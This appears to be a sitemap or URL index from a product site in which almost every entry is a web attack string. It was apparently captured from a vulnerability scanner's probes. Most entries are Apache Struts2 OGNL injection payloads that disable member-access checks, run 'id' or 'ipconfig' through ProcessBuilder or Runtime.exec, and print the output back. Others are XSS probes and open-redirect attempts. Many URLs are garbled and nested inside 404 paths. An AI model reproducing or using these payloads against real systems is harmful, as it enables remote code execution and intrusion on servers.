http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?xsstest? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?=%3c498585%20x%3d993518237%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?method%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=xcfcm? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?=%3c192185%20x%3d976676458%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e(_002_product.html?=%3c7b6115%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?=%3c839005%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?=%3c363713%20x%3d971838376%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?=%3c119b77%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?=%3ca5b21b%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f=%3c119b77%3c? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?xsstest? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?$%7b100002-1%2b'anonymous_'%2b'security_s2015_test'%7d.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/fsm13432%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem75222?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%27%5b%5d_002_product.html%3f=%3c363713+x%3d971838376%3e? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%27_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%27_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%27_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%27_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?&redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'%5b%5d_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%27_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%27_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?=%3c619277%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%27_002_product.html%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%27_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%27_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27_002_product.html%3f=%3c619277%3c? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%27_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3f=%3c839005%3c? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530(_002_product.html?=%3c462748%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?=%3c7711b3%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%27%5b%5d_002_product.html%3f=%3c7711b3%3c? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?=%3c932732%20x%3d912793398%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html%3f=%3c932732+x%3d912793398%3e? 0.5 2024-04-15 